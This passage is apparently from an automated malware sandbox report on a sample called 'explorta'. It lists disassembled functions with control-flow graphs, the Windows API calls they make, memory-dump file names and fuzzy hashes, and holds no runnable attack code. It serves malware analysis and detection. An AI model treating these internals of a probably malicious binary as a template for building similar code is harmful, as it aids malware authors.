                                                                                                                                                                                                                                          control_flow_graph 1470 5ccda4-5ccdc5 call 5ad770 1473 5ccddf-5ccde2 1470->1473 1474 5ccdc7 1470->1474 1475 5ccdfe-5cce0a call 5c9f38 1473->1475 1477 5ccde4-5ccde7 1473->1477 1474->1475 1476 5ccdc9-5ccdcf 1474->1476 1490 5cce0c-5cce0f 1475->1490 1491 5cce14-5cce20 call 5ccd2e 1475->1491 1478 5ccdd1-5ccdd5 1476->1478 1479 5ccdf3-5ccdfc call 5cccec 1476->1479 1477->1479 1480 5ccde9-5ccdec 1477->1480 1478->1475 1482 5ccdd7-5ccddb 1478->1482 1495 5cce3c-5cce45 1479->1495 1483 5ccdee-5ccdf1 1480->1483 1484 5cce22-5cce32 call 5c6cf3 call 5c643a 1480->1484 1482->1484 1487 5ccddd 1482->1487 1483->1479 1483->1484 1484->1490 1487->1479 1492 5ccf7b-5ccf8a 1490->1492 1491->1484 1500 5cce34-5cce39 1491->1500 1498 5cce47-5cce4f call 5c853b 1495->1498 1499 5cce52-5cce63 1495->1499 1498->1499 1503 5cce79 1499->1503 1504 5cce65-5cce77 1499->1504 1500->1495 1505 5cce7b-5cce8c 1503->1505 1504->1505 1507 5cce8e-5cce90 1505->1507 1508 5ccefa-5ccf0a call 5ccf37 1505->1508 1510 5ccf8b-5ccf8d 1507->1510 1511 5cce96-5cce98 1507->1511 1517 5ccf0c-5ccf0e 1508->1517 1518 5ccf79 1508->1518 1515 5ccf8f-5ccf96 call 5c8583 1510->1515 1516 5ccf97-5ccfaa call 5c5dcd 1510->1516 1513 5cce9a-5cce9d 1511->1513 1514 5ccea4-5cceb0 1511->1514 1513->1514 1519 5cce9f-5ccea2 1513->1519 1520 5ccef0-5ccef8 1514->1520 1521 5cceb2-5ccec7 call 5ccd9b * 2 1514->1521 1515->1516 1534 5ccfac-5ccfb6 1516->1534 1535 5ccfb8-5ccfbe 1516->1535 1524 5ccf49-5ccf52 1517->1524 1525 5ccf10-5ccf26 call 5c9de1 1517->1525 1518->1492 1519->1514 1526 5cceca-5ccecc 1519->1526 1520->1508 1521->1526 1549 5ccf55-5ccf58 1524->1549 1525->1549 1526->1520 1532 5ccece-5ccede 1526->1532 1539 5ccee0-5ccee5 1532->1539 1534->1535 1540 5ccfec-5ccff7 call 5c6cf3 1534->1540 1541 5ccfd7-5ccfe8 RtlAllocateHeap 1535->1541 1542 5ccfc0-5ccfc1 1535->1542 1539->1508 1544 5ccee7-5cceee 1539->1544 1553 5ccff9-5ccffb 1540->1553 1546 5ccfea 1541->1546 1547 5ccfc3-5ccfca call 5c9531 1541->1547 1542->1541 1544->1539 1546->1553 1547->1540 1560 5ccfcc-5ccfd5 call 5c85a9 1547->1560 1550 5ccf5a-5ccf5d 1549->1550 1551 5ccf64-5ccf6c 1549->1551 1550->1551 1555 5ccf5f-5ccf62 1550->1555 1551->1518 1556 5ccf6e-5ccf76 call 5c9de1 1551->1556 1555->1518 1555->1551 1556->1518 1560->1540 1560->1541
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a500fc218d2d6375231f49286525919e489325a7d83753598a782e543b31d798
                                                                                                                                                                                                                                          • Instruction ID: 49a194de2fb7cfa41cd029c03373853e48fdecb82c261bbd59bbd4bd0797e5f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a500fc218d2d6375231f49286525919e489325a7d83753598a782e543b31d798
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A61C236D002159FDF25ABE8D889FEDBFA5FB56310F24402EE44AAB291D6308D44C791
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00597E50 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1564 597e50-597ed1 call 5c38d0 1568 597edd-597f05 call 5a71e0 call 595d40 1564->1568 1569 597ed3-597ed8 1564->1569 1577 597f09-597f2b call 5a71e0 call 595d40 1568->1577 1578 597f07 1568->1578 1570 59801f-59803b call 5ac7d1 1569->1570 1583 597f2d 1577->1583 1584 597f2f-597f48 1577->1584 1578->1577 1583->1584 1587 597f79-597fa4 1584->1587 1588 597f4a-597f59 1584->1588 1591 597fd1-597ff2 1587->1591 1592 597fa6-597fb5 1587->1592 1589 597f5b-597f69 1588->1589 1590 597f6f-597f76 call 5ace48 1588->1590 1589->1590 1595 59803c-598041 call 5c644a 1589->1595 1590->1587 1593 597ff8-597ffd 1591->1593 1594 597ff4-597ff6 GetNativeSystemInfo 1591->1594 1597 597fc7-597fce call 5ace48 1592->1597 1598 597fb7-597fc5 1592->1598 1599 597ffe-598005 1593->1599 1594->1599 1597->1591 1598->1595 1598->1597 1599->1570 1604 598007-59800f 1599->1604 1607 598018-59801b 1604->1607 1608 598011-598016 1604->1608 1607->1570 1609 59801d 1607->1609 1608->1570 1609->1570
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 00597FF4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                                          • Opcode ID: edc3f4143234a0caecdecb34e625319bcbb0b8a5ae79a3caf4ca73388f31c364
                                                                                                                                                                                                                                          • Instruction ID: 4fda9902e784c58247c91e3c78a4fbc2ce200ff15d5301fa9aa49b73382492ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edc3f4143234a0caecdecb34e625319bcbb0b8a5ae79a3caf4ca73388f31c364
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51F871D142089BEF24EB68CD4DBEDBF75FB46310F504299E414A72C2EB359AC48B91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005C6821 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1610 5c6821-5c6837 1611 5c6839-5c683d 1610->1611 1612 5c6847-5c6857 1610->1612 1611->1612 1613 5c683f-5c6845 1611->1613 1617 5c6859-5c686b SystemTimeToTzSpecificLocalTime 1612->1617 1618 5c6897-5c689a 1612->1618 1614 5c689c-5c68a7 call 5ac7d1 1613->1614 1617->1618 1620 5c686d-5c688d call 5c68a8 1617->1620 1618->1614 1622 5c6892-5c6895 1620->1622 1622->1614
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 005C6863
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$LocalSpecificSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2574697306-0
                                                                                                                                                                                                                                          • Opcode ID: 3613b0bd3466e776c26303714786d3411aa282c8b29474ba00a2d76a7d25ca85
                                                                                                                                                                                                                                          • Instruction ID: d070ee14cf644f9ff5ae70d872fcc7b5b00828938f1fa9f3e5abd21768ff1657
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3613b0bd3466e776c26303714786d3411aa282c8b29474ba00a2d76a7d25ca85
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 571196B290010DAFDF11DAD5C985EDF7BFCAF48310F60526AE515E6180EA35EB488BA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005CCF9F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1623 5ccf9f-5ccfaa 1624 5ccfac-5ccfb6 1623->1624 1625 5ccfb8-5ccfbe 1623->1625 1624->1625 1626 5ccfec-5ccff7 call 5c6cf3 1624->1626 1627 5ccfd7-5ccfe8 RtlAllocateHeap 1625->1627 1628 5ccfc0-5ccfc1 1625->1628 1633 5ccff9-5ccffb 1626->1633 1630 5ccfea 1627->1630 1631 5ccfc3-5ccfca call 5c9531 1627->1631 1628->1627 1630->1633 1631->1626 1636 5ccfcc-5ccfd5 call 5c85a9 1631->1636 1636->1626 1636->1627
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,005C9E9D,?,?,005C612A,?,00000000,?,?,005C6D5E,?,00000000), ref: 005CCFE1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 971c80ea36c352aa94ed41dbee3532ba72d6eb944413cf505ba0b803fe60de7b
                                                                                                                                                                                                                                          • Instruction ID: 13ee6b109a7b94f86604b0ddb02cb8c2f52be1b4b4ac60c158965e12d0d6175a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 971c80ea36c352aa94ed41dbee3532ba72d6eb944413cf505ba0b803fe60de7b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F0B4325442256E9B212BE15C15F6B7F8AFF923A0B14541EFD0CEA181CB70DD0081E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005CA7BB Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,031683DB,?,?,005ACBE1,031683DB,?,005A726B,?,?,?,?,?,?,00596FE5,?), ref: 005CA7EE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 84be13a677e69423d8a5c533bb1376e1406a280929fe82830a63a5e4c1ab80a0
                                                                                                                                                                                                                                          • Instruction ID: d51d419cbc823a495475a1e8e3d52150ec8b6833392fe29a4579a55b1baafe92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84be13a677e69423d8a5c533bb1376e1406a280929fe82830a63a5e4c1ab80a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E0653550122B6ED62122E55C45FAB6EE8FF823B4F150129AC1596181DF65DD4181E2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005A63F0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                          • Opcode ID: 15f572d2ceff462cc2d2c55b6e332e753ce89658155f631171add7bdf04af126
                                                                                                                                                                                                                                          • Instruction ID: 47e4fd651479bf8c3147a4282a793cabd0e90e36f6aa45e32d08ea7610f32b24
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15f572d2ceff462cc2d2c55b6e332e753ce89658155f631171add7bdf04af126
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF0D671900604A7C711BB688D0B72D7FA4B746720F900248E8106B2D1EA741A0487D2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05320A95 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: aa224bc7ec6027513430a563503bc51190b636be58ff98937dd16d2c9138ccf7
                                                                                                                                                                                                                                          • Instruction ID: 8773ac88e2fa1f540e3caedb07ecf635a3fe417a778f39d23a193a88c5e9c140
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa224bc7ec6027513430a563503bc51190b636be58ff98937dd16d2c9138ccf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57117FB711E930BEA646C5116FA8DFA3BAFE5C3330731846BF841C7942D156C94D9131
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05320AB9 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17edbadabf4794fc65fe9478dfd46cda8c7bd9dcf3438ef3166e53552933386e
                                                                                                                                                                                                                                          • Instruction ID: d2f4d19e23970138b0cc0b12d3f1115b3b0bf7a8d7b446d63d59fe684ccc3323
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17edbadabf4794fc65fe9478dfd46cda8c7bd9dcf3438ef3166e53552933386e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30012BB220D530AE965AD5156F98DFA37AFE6C2334730802AF442C7542C255C94D6131
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05320AF7 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4311651997d9dc14d357a8bd3a7ab74e6b71b74132d243856a20e07014f0f83b
                                                                                                                                                                                                                                          • Instruction ID: 530fe8b2278fe1f4d02613111f32929a6543535029977708ab519f22279343f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4311651997d9dc14d357a8bd3a7ab74e6b71b74132d243856a20e07014f0f83b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 440149F320C261AFA905CD02AA54AFA67ADE6E3734334842BF442C7542D299CD4E9231
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05320B75 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 180fa34100550b23757779a120c7d3f1151069a30c03ad296ef1c0397b451335
                                                                                                                                                                                                                                          • Instruction ID: 8a56e03fed130f802d840a773fbc671d5d72c2d37e2552d3c4688d4f4a61b9e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 180fa34100550b23757779a120c7d3f1151069a30c03ad296ef1c0397b451335
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E0170B720D5217FA51AD822FB59DFA7FAFEAC2734334841BF482C6401D1958D4D6071
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 05320AE5 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
